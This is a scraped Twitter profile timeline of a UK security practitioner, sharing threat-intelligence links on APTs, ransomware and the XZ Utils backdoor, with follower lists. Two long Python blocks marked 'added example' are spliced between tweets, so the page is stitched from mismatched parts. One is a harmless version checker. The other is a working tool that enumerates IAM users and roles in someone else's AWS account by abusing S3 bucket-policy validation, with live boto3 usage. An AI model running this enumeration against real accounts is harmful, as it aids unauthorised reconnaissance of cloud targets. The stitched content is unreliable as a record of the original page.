linkcabin @LinkCabin
Works in Security. Social Democracy. Change the World or Nothing. Personal Account not my employers, my own views! itsjack.cc UK Joined August 2012
428 Tweets | 3K Followers | 93 Following | 482 Likes
Too many corporate CTI shops staffed by former Mil / Govies overindex on nation-state APT. Suspect it's in part because they are looking at Capability more than Intent, but also because it's what they used to track and it's cool. Ransomware actors FAR greater threat to most.
Amazing that a chip bricked in 46-yr-old Voyager I, preventing it from sending data, and NASA figured out how to split up and reallocate its functions to other hardware, sending code 15 billion miles away (45 hours round trip!)--and Voyager's back online. blogs.nasa.gov/voyager/2024/0…
Hopefully not lost in the noise today: a report from @WithSecure on Kapeka, an APT44 toolset we track as COLDWELL (dropper) and ICYWELL (backdoor). Some detection rules in the fresh APT44 report, but be sure to read their detail analysis below first labs.withsecure.com/publications/k…
Have Elastic and security experience? Why not work with me in protecting Thought Machine against threats! Apply below, DMs open - thoughtmachine.avature.net/careers/JobDet…
Join our expanding team at the European Cyber Conflict Research Incubator! We're currently seeking a Senior Program Manager and a Research Assistant. europeancyber.org/vacancies/
We’re responding to CVE-2024-3094, a reported supply chain compromise affecting XZ Utils versions 5.6.0 and 5.6.1. XZ Utils may be present in Linux distributions. See our additional guidance at cisa.gov/news-events/al….
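A quick local check for the versions named in the CISA alert, added here as an example (not CISA's or the XZ project's code). The only facts it takes from the alert are the affected releases, 5.6.0 and 5.6.1; the sample `xz --version` outputs are constructed to mirror the two-line format the real tool prints (one line for the `xz` binary, one for the linked `liblzma`), so the parser is exercised offline.

```python
"""Flag XZ Utils / liblzma builds in the CVE-2024-3094 release range.

Added example for this page, not CISA's or the XZ project's code. AFFECTED holds
the two releases the CISA alert names; everything else (sample outputs, the
helper names) is constructed for illustration.
"""
import re
import subprocess
from typing import Dict, List, Tuple

# Releases named in the CISA alert (CVE-2024-3094).
AFFECTED = {(5, 6, 0), (5, 6, 1)}

# `xz --version` prints "xz (XZ Utils) X.Y.Z" then "liblzma X.Y.Z"; capture both,
# because a distro may have downgraded the binary but left the library in place.
VERSION_RE = re.compile(
    r"^(?P<component>xz \(XZ Utils\)|liblzma)\s+(?P<ver>\d+\.\d+\.\d+)", re.M
)


def parse_xz_version(output: str) -> Dict[str, Tuple[int, int, int]]:
    """Map 'xz' / 'liblzma' to the (major, minor, patch) tuple each reports."""
    found: Dict[str, Tuple[int, int, int]] = {}
    for m in VERSION_RE.finditer(output):
        name = "xz" if m.group("component").startswith("xz") else "liblzma"
        major, minor, patch = (int(x) for x in m.group("ver").split("."))
        found[name] = (major, minor, patch)
    return found


def affected_components(output: str) -> List[str]:
    """Names of components whose reported version is in AFFECTED (sorted)."""
    return sorted(
        name for name, ver in parse_xz_version(output).items() if ver in AFFECTED
    )


def live_check() -> List[str]:
    """Run `xz --version` on this host and report affected components ([] if no xz)."""
    try:
        proc = subprocess.run(
            ["xz", "--version"], capture_output=True, text=True, check=False
        )
    except FileNotFoundError:
        return []
    return affected_components(proc.stdout)


# Constructed sample outputs (not captured from a real system).
SAMPLE_BAD = "xz (XZ Utils) 5.6.1\nliblzma 5.6.1\n"
SAMPLE_OK = "xz (XZ Utils) 5.4.6\nliblzma 5.4.6\n"
SAMPLE_MIXED = "xz (XZ Utils) 5.4.6\nliblzma 5.6.0\n"  # binary rolled back, library not

if __name__ == "__main__":
    for label, sample in (("bad", SAMPLE_BAD), ("ok", SAMPLE_OK), ("mixed", SAMPLE_MIXED)):
        print(label, affected_components(sample))
    print("this host:", live_check())
```

The version string alone is a triage signal, not a verdict: the backdoor lives in liblzma and is only reached through the library that sshd maps, so on a flagged host also confirm which liblzma the running sshd has loaded and follow the distribution's own remediation guidance.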
Over 170K Users Affected by Attack Using Fake Python Infrastructure : checkmarx.com/blog/over-170k…
Looking at the Validin host fingerprint for the traffic generated by WSCRIPT, some additional (now offline) domains: infotime[.]page berlin.infotime[.]page hamburg.infotime[.]page heidelberg.infotime[.]page munich.infotime[.]page bremen.infotime[.]page
The bitskrieg that was and wasn’t: the military and intelligence implications of cyber operations during Russia’s war on Ukraine: Intelligence and National Security: Vol 0, No 0 tandfonline.com/doi/full/10.10…
There's some really good stuff here
Open source Threat Informed DetectionOps Platform. The presentation was impressive. code.europa.eu/ec-digit-s2/op…
Just published blog post #128 (2^7) 👨🏻💻🙌🏼 Read: "Apple Gets an 'F' for Slicing Apples" An important macOS API has a subtle flaw that can impact malware detection / security tools! 👾🍎🫣 objective-see.org/blog/blog_0x80…
New blog post: AWS Ransomware dfir.ch/posts/aws_rans… An attacker compromised an AWS account and subsequently deleted all buckets in the S3 storage. They left a 'recovery' binary behind, which we analyzed :) Enjoy.
Fascinating stuff here from MSFT: "Forest Blizzard’s (APT28) use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations."
I love this graph. It tells the truth. The #Ransomware Operator to be successful needs to pay Initial Access Brokers and acquire Infostealer Malware logs to gain access to potential victims. chainalysis.com/blog/ransomwar…
The Okta hack that keeps on giving! Cloudflare announced a new data breach today in its continued battle against creds stolen during a previous Okta hack. Let's dig in:
Fantastic write up on a cloud IR case in AWS
MalwareHunterTeam @malwrhunterteam (219K followers, 36 following): Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.
Karsten Hahn @struppigel (22K followers, 702 following): Malware Researcher at G DATA. Ransomware hunter. he/him 🦔🌈🏳️⚧️
ςεяβεяμs - м.. @c3rb3ru5d3d53c (21K followers, 235 following): 💕 Malware Hunter Killer 💕 #binlex & #mwcfg Developer 📽️ YouTuber 👩💻 She/Her 💍@DravenSwiftbow Support my work 👇 ☕️ https://t.co/SfTI8uJa23
blackorbird @blackorbird (28K followers, 600 following): Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit Need Job
Kris McConkey @smoothimpact (5K followers, 867 following): #threatintel and #dfir lead @ PwC. Blue team forever. Christian, husband, dad, coffee addict, bad photographer, awful cyclist. Tweets my own, not PwC's.
Steve YARA Synapse Mi.. @stvemillertime (15K followers, 1K following): cyber-physical intel @google writing & sharing on adversary tradecraft, dfir, malware, threat detection, ics/ot intel and all things #yara
Silas Cutler // p1nk @silascutler (13K followers, 2K following): Hacker, sometimes researcher @Only_Scans, @mal_share Resident Hacker @InsideStairwell, Adjunct Senior Cyber Threat Researcher @IST_org,
hasherezade @hasherezade (84K followers, 845 following): Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Allison Wikoff @SaltyWikoff (540 followers, 823 following): #threatintel Americas Lead @pwc. Hype woman. Beach Rat. Former Adjunct @Columbia. Lover of all the APTs. | All views are my own. @[email protected]
John @BitsOfBinary (2K followers, 392 following): #threatintel @PwC_UK. Reverse engineering, threat intelligence, YARA. Amateur jazz pianist. All tweets are my own. He/him.
Catalin Cimpanu @campuscodi (112K followers, 1K following): Parked account. I don't post here anymore. Follow me on Mastodon: @[email protected]
Michael Koczwara @MichalKoczwara (18K followers, 2K following): Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon) https://t.co/vixTz8xKuF https://t.co/VQWaze6gaF
sierra 🪩s0urcesmet.. @s0urcesmeth0ds (687 followers, 1K following): #threatintel @PwC, CTO @fbiaia, intelligence operations, analysis & tradecraft ⚙️, in some state of assessment building/refining 🔮, 💜@JMU💛, views mine
0verfl0w @0verfl0w_ (15K followers, 248 following): Malware Reverse Engineer & Malware Analysis Course Author - https://t.co/m6I87rMy88 & https://t.co/NxBzTphofl
SentinelOne @SentinelOne (52K followers, 1K following): ONE autonomous platform to prevent, detect, respond, and hunt. Do more, save time, secure your enterprise: https://t.co/N75g1HAnCs 🐱💻
Erika Bellinger @BellingerE46552 (68 followers, 5K following)
DonMonkei @KontraSkynet (15 followers, 544 following)
Yusuf Nashir @Ysfnashir (22 followers, 132 following): Everything has already been arranged by God. Live what is in front of you now and finish what you have started.
Nsk @nsk_offl_ (315 followers, 3K following): Director🎬& Lyricist of Kattravai Katrapin & Onedaykadhalan CyberSecurity Analyst,Travel freak, Ardent Suriya ❤ Jo,Maddy🤩,VJS😍 Fan,CR7MSD Fan🤟,Maduraikaran😎
Wafer4014 @Wafer4014 (67 followers, 197 following)
Henry Chau @HinWai10 (26 followers, 462 following): They won freedom while lost nothing but their shackles. 中英粵 Mandarin English Cantonese
clarkee @Clarkee (442 followers, 494 following): KICKIN IN THE FRONT SEAT, SITTIN IN THE BACK SEAT, GOTTA MAKE MY MIND UP, WHICH SEAT CAN I TAKE?
Pavithran K @PavithranK76042 (18 followers, 78 following)
a solitary soul thriv.. @0xsuperdemon (142 followers, 2K following): Unreadiness to following, reluctant to followers. A visionary path treader, rethinker, and on a second thought life overwhelms me, I do not know anything, AMA!
De_isberg @Deberg2022 (174 followers, 4K following)
Meric Sheehan @p0tat033s (48 followers, 180 following)
The Eighth Life @TheEighthLife_ (0 followers, 53 following)
زەردەشت @zzardaasht (263 followers, 450 following)
mindfulcyb @mindfulcyb (58 followers, 135 following)
Jevi @re_jevi (5K followers, 540 following): Provide Akamai API Provide Kasada API jevi#0417 [email protected]
hell-00 @he1100_1100 (701 followers, 5K following)
ganesh kumar @asish80 (12 followers, 673 following)
Ayosomoza @ayosomoza (54 followers, 772 following)
Dexter Castor Döppin.. @CastorDopping (26 followers, 186 following): Opinions are my own and do not reflect reality
f1h3 @f1h3__ (8 followers, 35 following)
HermineZurawski @HZurawski9850 (97 followers, 2K following)
th_monkey @trickster_hunt (47 followers, 497 following)
CA$H @RobJTejas (333 followers, 3K following): Engineer turned Digital Forensicator. Thinker, tinkerer, inventor, artist, home chef, gamer, home brewer. Socially aware, spiritually awoke.
ً ً @Guccifer02 (4 followers, 185 following)
om prakash @om_prakash_ias (3 followers, 198 following)
ProfessorX99 @DreamerStudioTz (849 followers, 4K following): Graphics Design | Photographer | Videographer |
TH SIJ @th_sij (53 followers, 392 following)
GzobraJn @gzobraJn (40 followers, 354 following): World of today, sciences and people. DFIR / Threat Intel on a daily basis. Music and books as often as possible. Opinions are my own. RTs are not endorsements.
Luke @0xlethe (5 followers, 50 following)
ZenX @ZenX_273_15 (95 followers, 690 following): Can't stand corruption, oppression and thugs. My motto : ubivis semper
lt23 @gr3ycardinal (1 follower, 800 following)
emacs_hacker @philohack_ (148 followers, 3K following)
Virus Bulletin @virusbtn (59K followers, 1K following): Security information portal, testing and certification body. Organisers of the annual Virus Bulletin conference. @[email protected]
Andrew Thompson @ImposeCost (34K followers, 1K following): Head of Research and Discovery @Mandiant/@GoogleCloud. Understanding and countering adversaries. Posts attributable to me, not my employer.
Łukasz @maldr0id (13K followers, 999 following): Military-grade @Android malware reverse engineer @Google || "Tom Brady of malware strings analysis" - @MalwareTech || Tweets are my own opinions || he/him ✨🌈🦄
briankrebs @briankrebs (348K followers, 2K following): Independent investigative journalist. Author of 'Spam Nation,' a NYT bestseller. Former Washington Post reporter. Mastodon: https://t.co/fTKNavlMwp
Ollie Whitehouse @ollieatnowhere (5K followers, 1K following): CTO @NCSC Former: PortSwigger, Interrupt Labs, NCC Group, BlackBerry, Symantec and Atstake
Objective-See Foundat.. @objective_see (19K followers, 1 following): 🍎 🛡️ 🛠️ Open-Source Tools 📚 "The Art of Mac Malware" books 🫂 "Objective by the Sea" conference Support us on https://t.co/tuGceSeyiC 🙏
Jon DiMaggio @Jon__DiMaggio (7K followers, 811 following): Bad guy chaser, writer/author, espionage & ransomware SME. Sometimes I harass my dog. He is the brains behind these projects and opinions are his.
NOELREPORTS 🇪🇺 .. @NOELreports (431K followers, 356 following): Media platform covering global conflict zones. Focus on the Russian-Ukrainian war. If you'd like to support our voluntary work: https://t.co/PmM2wwDA1Y.
Jrnl Intel & Nat Sec @IntelNatSecJnl (6K followers, 205 following): The Twitter account for Intelligence & National Security (a Routledge journal). Managed by Social Media Editor David Strachan-Morris
Tomas Pueyo @tomaspueyo (336K followers, 548 following): Understand deeply how the world works today to navigate the world of tomorrow. Join 80k ppl in my free newsletter:
Bitmap Books @bitmap_books (26K followers, 7K following): We pride ourselves on creating retro gaming books of the highest quality. Contact: [email protected] News: https://t.co/AZKDWH0UXd
Society for Intellige.. @SocIntelHist (5K followers, 476 following): We are a membership organization for scholars focused on intelligence history, an ever-growing group that does not fit neatly into other historical subfields.
Paul Darbyshire 🇪.. @pablo_0151 (10K followers, 962 following): Coffee-powered optimist. Lover of family and video games. Super Famicom hoarder, SNK nut, likes old JRPGs and box art. 🦑
Filip Kovacevic @ChekistMonitor (5K followers, 971 following): PhD. Expertise: KGB (operations, personnel, spy fiction). Contributor @CWIHP, @talk_spy. 20+ years university teaching in Russia/Balkans/US. Now at @usfca.
Electronic Eggs ⚡.. @ElectronicEggs (30K followers, 168 following): Old games, Cherry Coke & Vanilla Ice-Cream Monster Munch @GuyFawkesRetro - lots of side-scrolling and top-down arcade games
avallach (@xorhex@inf.. @xorhex (1K followers, 1K following): Malware Researcher Tweets are my own and do not reflect my employer. On Mastodon as @[email protected] Creator of https://t.co/woQLhjSmV0
Intl Jrnl of Intellig.. @Intel_IJIC (4K followers, 203 following): Welcome to the Twitter account for the International Journal of Intelligence and CounterIntelligence, a journal for practitioners and scholars of intelligence.
Journal of Threat Int.. @JournalOfTIIR (421 followers, 8 following): A peer reviewed journal that publishes original research and findings in the domains of threat intelligence and incident response.
Simon Fredsted @fredsted (490 followers, 1K following): Always test your assumptions. Founder, @webhooksite
Dan Black @DanWBlack (4K followers, 1K following): 🇨🇦 Manager, Cyber Espionage Analysis @Mandiant @GoogleCloud. Previous: @NATO Cyber Threat Analysis Branch & @cybercentre_ca. Views personal.
Nikolay Bozhkov 尼.. @nbozhkoff (234 followers, 2K following): cyber threat intelligence @NATO. Likes/RTs ≠ endorsements.
big rob 🏴.. @SimpleFacks (61K followers, 88 following): satirical account - a fella from norf ingerland who luvs footy, pollertiks n carlin
Johanna MM Strachan @jmms_cyber (27 followers, 39 following): Cyber Security @PwC UK, all views my own. Fashion enthusiast, labrador owner & a bit of incident response on the side ✌🏼
Gabriel Currie @gabrielcurrie (586 followers, 514 following): Head of Cyber Security for @cabinetofficeuk 🇬🇧. Wannabe chef and gardener, @BritishArmy reservist, and previously @PwC_UK.
Jacob Rees-Evans @JacobReesEvans1 (25 followers, 84 following): Threat Detection and Response at @PwC_UK | Views my own | #DFIR #InfoSec
USCYBERCOM Cybersecur.. @CNMF_CyberAlert (69K followers, 93 following): This is Cyber National Mission Force's alert mechanism to contribute to our shared global cybersecurity (Following, retweets and links do not equal endorsement)
Malcolm V Tucker 🏴.. @Tucker5law (41K followers, 13K following): 'unbelievably rude' - Rupert. Never ascribe to malice that which is adequately explained by fuckwittery. Voice on @AngryScotland.
Joe Słowik 🌻 @jfslowik (29K followers, 1K following): CTI, OT/ICS, DE&TH, and related infosec content. Oh, and memes. And shitposting. Lots of shitposting.
Your Rideshare Driver @ride_trips (20K followers, 95 following): Rideshare driver and father. Author of Drive: Scraping by in Uber's America, out May 2024. Pre-order at https://t.co/TPXNrRHle6
Yonathan Klijnsma @ydklijnsma (14K followers, 2K following): Head of Threat Research at @RiskIQ. Trying to solve every puzzle I run into. Opinions expressed here are my own. (Formerly Sr. Threat Researcher @foxit)
Lloyd Davies @LloydLabs (3K followers, 345 following)
Jason @CyberZen_ (59 followers, 544 following): On the shores of incident response, knee deep in forensics. Python devotee. Malware RE wannabe.
idatips @idatips (4K followers, 3 following): Tips and tricks for everyone's favorite disassembler. Account not run by Hex-Rays.
CyberWar - 싸워 @cyberwar_15 (5K followers, 117 following): Since 2001-08-08 / We have been fighting North Korean cyber operatives since 8 August 2001.
Drunk Binary @DrunkBinary (12K followers, 3K following): Principal Adversary Hunter @dragosinc, Army Veteran (3rd ACR, 1/10CAV, CYBERCOM), Cocktail Scientist, Threat Researcher/Analyst | #FSD
thaddeus e. grugq the.. @thegrugq (129K followers, 423 following): Hacker :: https://t.co/km8BR8E1Ga :: [email protected] :: PGP https://t.co/dYipV8y3bo :: @warstudies :: https://t.co/H3dWknFCfk :: https://t.co/Z2lWqEVVua
Bart @bartblaze (14K followers, 665 following): Threat Intel and more. Opinions are my own, unless retweeted. Open DMs.
Forscie @forscie (384 followers, 848 following): Digital Forensics & Incident Response, Co-Founder @PhishTool
R0 CREW @R0_CREW (6K followers, 290 following): A community of low-level information security researchers.
"A Real-World Law-Enforcement Breach of End-to-End Encrypted Messaging: The Case of Encrochat" is a talk presented by Sunoo Park at RWC 2024. youtu.be/AeKRS6_zxoc?fe… Slides here: iacr.org/submit/files/s…
Discover how unauthenticated enumeration exposes AWS IAM users & roles, leveraging cross-account vulnerabilities. Quiet Riot and S3 Bucket Policies unlock a new perspective on cloud security. A must-read for security pros. buff.ly/3vfrLxh
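The core of the Quiet Riot technique the linked post describes, as an added example (not the post's or Quiet Riot's own code). It relies on one behaviour of S3 that the technique documents: when a bucket policy is PUT, S3 validates every Principal ARN and rejects an unknown one with error code MalformedPolicy and the message "Invalid principal in policy", while an existing principal in any account is accepted. Everything else is assumed for illustration: the bucket name, the account ID, the candidate names, and `FakeS3`, a constructed stand-in for the boto3 client so the probe runs offline. In live use you pass `boto3_put_policy(boto3.client("s3"))` instead, against a bucket you own.

```python
"""IAM user/role enumeration by abusing S3 bucket-policy principal validation.

Added example; not the linked article's or Quiet Riot's code. Assumed: S3 rejects a
policy naming a non-existent principal with MalformedPolicy / "Invalid principal in
policy" and accepts one naming an existing principal, even in another account.
Bucket, account ID, names and FakeS3 below are constructed placeholders.
"""
import json
from typing import Callable, Iterable, List

PutPolicy = Callable[[str, str], None]  # (bucket, policy_json) -> None or raises


class PolicyError(Exception):
    """Normalised S3 error: code such as 'MalformedPolicy' plus its message."""

    def __init__(self, code: str, message: str) -> None:
        super().__init__(f"{code}: {message}")
        self.code, self.message = code, message


def build_probe_policy(bucket: str, principal_arn: str) -> str:
    # Deny-only statement on our own bucket: harmless if accepted, still validated.
    return json.dumps({
        "Version": "2012-10-17",
        "Statement": [{
            "Sid": "QuietRiotProbe",
            "Effect": "Deny",
            "Principal": {"AWS": principal_arn},
            "Action": "s3:GetObject",
            "Resource": f"arn:aws:s3:::{bucket}/*",
        }],
    })


def probe_principal(put_policy: PutPolicy, bucket: str, principal_arn: str) -> bool:
    """True if S3 accepted the ARN (principal exists), False on 'Invalid principal'."""
    try:
        put_policy(bucket, build_probe_policy(bucket, principal_arn))
    except PolicyError as err:
        if err.code == "MalformedPolicy" and "Invalid principal" in err.message:
            return False
        raise  # anything else (AccessDenied, throttling) is a real failure
    return True


def enumerate_principals(put_policy: PutPolicy, bucket: str, account_id: str,
                         candidates: Iterable[str], kind: str = "user") -> List[str]:
    """Return the candidate user/role names that exist in account_id."""
    assert kind in ("user", "role")
    found = []
    for name in candidates:
        arn = f"arn:aws:iam::{account_id}:{kind}/{name}"
        if probe_principal(put_policy, bucket, arn):
            found.append(name)
    return found


def boto3_put_policy(s3_client) -> PutPolicy:
    """Adapt a real boto3 S3 client, translating ClientError into PolicyError."""
    from botocore.exceptions import ClientError  # only needed for live use

    def put(bucket: str, policy: str) -> None:
        try:
            s3_client.put_bucket_policy(Bucket=bucket, Policy=policy)
        except ClientError as exc:
            err = exc.response["Error"]
            raise PolicyError(err["Code"], err["Message"]) from exc
    return put


class FakeS3:
    """Constructed stand-in for S3 that 'knows' a fixed set of principal ARNs."""

    def __init__(self, existing: Iterable[str]) -> None:
        self.existing, self.calls = set(existing), 0

    def put_bucket_policy(self, bucket: str, policy: str) -> None:
        self.calls += 1
        for stmt in json.loads(policy)["Statement"]:
            if stmt["Principal"]["AWS"] not in self.existing:
                raise PolicyError("MalformedPolicy", "Invalid principal in policy")


if __name__ == "__main__":
    # Constructed target: account 123456789012 with one user and one role.
    fake = FakeS3({"arn:aws:iam::123456789012:user/alice",
                   "arn:aws:iam::123456789012:role/Admin"})
    print(enumerate_principals(fake.put_bucket_policy, "probe-bucket",
                               "123456789012", ["alice", "bob", "svc-deploy"]))
    print(enumerate_principals(fake.put_bucket_policy, "probe-bucket",
                               "123456789012", ["Admin", "Deploy"], kind="role"))
```

Two operational points follow from the code: every probe is one PutBucketPolicy call, so a wordlist of N names costs N API calls and leaves N CloudTrail events in the prober's account, not the target's, which is what makes it unauthenticated from the victim's point of view; and because the last accepted probe remains on the bucket, delete the policy (`delete_bucket_policy`) when done.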
I often get asked what tools I use for various aspects of threat research / analysis -- Here's a quick list of my favorites that most are not taking advantage of.. 🧵
🚨 👀 - The @RecordedFuture Insikt Group 2023 Annual Report is here! We cover a lot of ground in this one. Vulnerabilities, artificial intelligence, legitimate internet services, hacktivism, ransomware, influence operations, and so much more! Must read! recordedfuture.com/2023-annual-re…
A lot of the current discussion on initial access and external-facing exploitation in #infosec #cybersecurity has me thinking of this talk I proposed to BHUSA in 2020 that was rejected, but that I thought about reporting anyway: youtube.com/watch?v=0OlLsv…
From now on we list APT groups that are active against targets in Germany. The sources are our own sensors in the government network, incidents handled by the BSI, and released reports from partners. More pages will follow soon. bsi.bund.de/DE/Themen/Unte…
When @alex_lanstein shares game, you best read up on what he’s saying
if you're into tracking BITTER, a few nuggets that may be useful blog.strikeready.com/blog/dont-get-…
🚨 New @RecordedFuture reporting just released revealing TAG-70's sophisticated cyber espionage in Europe. The report builds upon existing intelligence to highlight upstream infrastructure and actor tradecraft. #CyberSecurity #TAG70 #wintervivern recordedfuture.com/russia-aligned…
Looking forward to our next speaker: Sean Brennan will be talking about his super book, "The KGB and the Vatican: Secrets of the Mitrokhin Files," on Feb 13, 2024, 12:00 PM – 1:00 PM EST. Mark your calendar to join us! intelligencehistory.org/event-details/…
🕵️♂️ The silent torrent of VileRAT Get an in-depth, technical look at #VileRAT, a sophisticated Python-based malware believed to be the work of the #Evilnum threat group. Read our latest #threatresearch report here: stairwell.com/resources/tech…
late nights (evenings) in the lab (on the couch) working on something big (a mad decent YARA rule) and just grinding (watching basketball and eating ice cream, v cozy) its a mindset (I'll get bored and go to bed soon)
Properly configuring Microsoft Entra ID can help avoid cloud identity compromise that could lead to malicious attacks or even tenant destruction. The Microsoft Incident Response team provides guidance based on past engagements here: msft.it/6010iuKPK
How we will thank the vulnerability research community at @NCSC going forward - see the blog 'Thanking the vulnerability research community with NCSC Challenge Coins' "we’ll now also be awarding NCSC Challenge Coins to selected researchers." ncsc.gov.uk/blog-post/than…
In our latest writeup we analyze new macOS malware from BlueNoroff APT group that executes shell commands remotely on targeted systems. 👀
Stay vigilant, Mac users! The Jamf Threat Labs team uncovered a new piece of malware linked to the BlueNoroff group targeting macOS devices, which allows remote attacker access to the device. Read our latest research for full details. Stay safe out there! ow.ly/7gWC50Q4NJI
New open access article on eliciting information through undercover operations: tandfonline.com/doi/full/10.10…
proofpoint.com/us/blog/threat… confused by the fake browser landscape? me too - that's why I'm glad my teammates track this. Come for the clarity, stay for the inject examples to show the differences between the kits!